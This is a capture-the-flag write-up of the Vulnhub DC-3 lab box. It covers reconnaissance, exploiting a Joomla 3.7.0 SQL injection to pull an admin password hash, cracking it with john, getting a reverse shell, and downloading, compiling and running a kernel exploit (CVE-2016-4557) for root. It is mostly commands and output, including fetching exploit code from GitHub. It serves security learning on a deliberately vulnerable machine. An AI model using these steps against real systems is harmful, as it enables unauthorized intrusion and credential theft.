Vulnhub - DC 3

Box Stats

Box Info Details
Box Name : DC 3
Series : DC
Difficulty : Easy/Medium
Release Date : 25 Apr 2020
OS : GNU/Linux
Maker : DCAU
Download : DC 3
Recommended : Yes :heavy_check_mark:

Summary

Hello all, let’s continue the DC series. This box was an easy one, it’s about a vulnerable to SQLi joomla version. This gives us the creds we login and upload out shell. Privesc to root is a simple kernel exploit. Let’s pwn it!

PoC

Target IP

Always first step is to find target IP address, i prefer to use the arp-scan utility. Then we’ll save the IP address in a variable.

1
2
3
$ arp-scan --localnet | grep "PCS Systemtechnik GmbH"
192.168.1.18	08:00:27:38:8b:a0	PCS Systemtechnik GmbH
$ ip=192.168.1.18

Enumeration/Reconnaissance

Now as always let’s continue with a nmap scan.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
$ nmap -p- --min-rate 10000 $ip
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-20 17:29 EET
Nmap scan report for dc-3.zte.com.cn (192.168.1.18)
Host is up (0.00044s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 08:00:27:91:ED:93 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.34 seconds

$ nmap -p 80 -sC -sV -oN nmap/dc3.vulnhub $ip
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-20 17:29 EET
Nmap scan report for dc-3.zte.com.cn (192.168.1.18)
Host is up (0.00056s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home

Once we visit the website we can see that is running joomla. We can double-check that using whatweb.

1
2
$ whatweb http://$ip/ | tee scans/whatweb.txt
http://192.168.1.18/ [200 OK] Apache[2.4.18], Bootstrap, Cookies[460ada11b31d3c5e5ca6e58fd5d3de27], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], HttpOnly[460ada11b31d3c5e5ca6e58fd5d3de27], IP[192.168.1.18], JQuery, MetaGenerator[Joomla! - Open Source Content Management], PasswordField[password], Script[application/json], Title[Home]

Googling around for a joomla vulnerability scanner, i found out this joomscan that is pre-installed on kali. Let’s fire it up!

1
2
3
4
5
6
7
8
9
10
11
$ joomscan --url http://$ip/ | tee scans/joomscan.txt

Processing http://192.168.1.18/ ...

[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version
[++] Joomla 3.7.0

...data...

A really important thing that tell us is the version 3.7.0! Let’s search for possible exploits.

1
2
3
4
5
$ searchsploit joomla 3.7.0
----------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                 |  Path
----------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Joomla! 3.7.0 - 'com_fields' SQL Injection                                                                                                     | php/webapps/42033.txt

Perfect, this exploit is about sqlmap i googled around and i found a python one that automates this. Let’s download it and run it.

1
2
3
4
5
6
7
8
9
$ wget -q https://raw.githubusercontent.com/stefanlucas/Exploit-Joomla/master/joomblah.py
$ python joomblah.py http://$ip/

 [-] Fetching CSRF token
 [-] Testing SQLi
  -  Found table: d8uea_users
  -  Found table: users
  -  Extracting users from d8uea_users
 [$] Found user ['629', 'admin', 'admin', 'freddy@norealaddress.net', '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu', '', '']

Perfect! We have admin’s hash. I used tunnelsup to find the hash type.

Let’s fire up our friend john.

1
2
3
4
5
6
7
$ john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
snoopy           (?)

Shell as www-data

Now we can login into admin panel /administrator as admin:snoopy. Follow my steps for a reverse shell:

1
2
3
4
5
6
7
$ nc -lvp 5555
listening on [any] 5555 ...

$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@DC-3:/$ whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Shell as root

I enumerated a lot but i really didn’t find something exploitable. But the last time the kernel was compiled was years ago.

1
2
www-data@DC-3:/$ uname -a
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux

Let’s upload linux-exploit-suggester to give us possible exploits.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
www-data@DC-3:/tmp$ wget -q https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh                 
www-data@DC-3:/tmp$ bash les.sh

Available information:

Kernel version: 4.4.0
Architecture: i686
Distribution: ubuntu
Distribution version: 16.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS

Searching among:

74 kernel space exploits
45 user space exploits

Possible Exploits:

...data...

[+] [CVE-2016-4557] double-fdput()

   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
   Exposure: highly probable
   Tags: [ ubuntu=16.04{kernel:4.4.0-21-generic} ]
   Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

I tried lot of them but only one worked the double-fdput() let’s download it -> compile it -> execute it!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
www-data@DC-3:/tmp$ wget -q https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip  
www-data@DC-3:/tmp$ unzip 39772.zip
Archive:  39772.zip
   creating: 39772/
  inflating: 39772/.DS_Store         
   creating: __MACOSX/
   creating: __MACOSX/39772/
  inflating: __MACOSX/39772/._.DS_Store  
  inflating: 39772/crasher.tar       
  inflating: __MACOSX/39772/._crasher.tar  
  inflating: 39772/exploit.tar       
  inflating: __MACOSX/39772/._exploit.tar  
www-data@DC-3:/tmp$ cd 39772
www-data@DC-3:/tmp/39772$ ls -la
total 48
drwxr-xr-x  2 www-data www-data  4096 Aug 16  2016 .
drwxrwxrwt 10 root     root      4096 Dec 21 02:01 ..
-rw-r--r--  1 www-data www-data  6148 Aug 16  2016 .DS_Store
-rw-r--r--  1 www-data www-data 10240 Aug 16  2016 crasher.tar
-rw-r--r--  1 www-data www-data 20480 Aug 16  2016 exploit.tar
www-data@DC-3:/tmp/39772$ tar -xf exploit.tar
www-data@DC-3:/tmp/39772$ ls -la
total 52
drwxr-xr-x  3 www-data www-data  4096 Dec 21 02:02 .
drwxrwxrwt 10 root     root      4096 Dec 21 02:01 ..
-rw-r--r--  1 www-data www-data  6148 Aug 16  2016 .DS_Store
-rw-r--r--  1 www-data www-data 10240 Aug 16  2016 crasher.tar
drwxr-x---  2 www-data www-data  4096 Apr 26  2016 ebpf_mapfd_doubleput_exploit
-rw-r--r--  1 www-data www-data 20480 Aug 16  2016 exploit.tar
www-data@DC-3:/tmp/39772$ cd ebpf_mapfd_doubleput_exploit
www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls -la
total 28
drwxr-x--- 2 www-data www-data 4096 Apr 26  2016 .
drwxr-xr-x 3 www-data www-data 4096 Dec 21 02:02 ..
-rwxr-x--- 1 www-data www-data  155 Apr 26  2016 compile.sh
-rw-r----- 1 www-data www-data 4188 Apr 26  2016 doubleput.c
-rw-r----- 1 www-data www-data 2186 Apr 26  2016 hello.c
-rw-r----- 1 www-data www-data  255 Apr 26  2016 suidhelper.c
www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ bash compile.sh
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .insns = (__aligned_u64) insns,
             ^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .license = (__aligned_u64)""
               ^
www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh  doubleput  doubleput.c  hello  hello.c  suidhelper	suidhelper.c
www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit# whoami;id
root
uid=0(root) gid=0(root) groups=0(root),33(www-data)

Reading the flag(s)

1
2
3
4
5
6
7
8
9
10
11
12
root@DC-3:/root# cat the-flag.txt

Congratulations are in order.  :-)

I hope you've enjoyed this challenge as I enjoyed making it.

If there are any ways that I can improve these little challenges,
please let me know.

As per usual, comments and complaints can be sent via Twitter to @DCAU7

Have a great day!!!!

Thank You

Thank you for taking the time to read my writeup. If you don’t understand something from the writeup or want to ask me something feel free to contact me through discord(0xatom#8707) or send me a message through twitter 0xatom

Until next time keep pwning hard! :fire: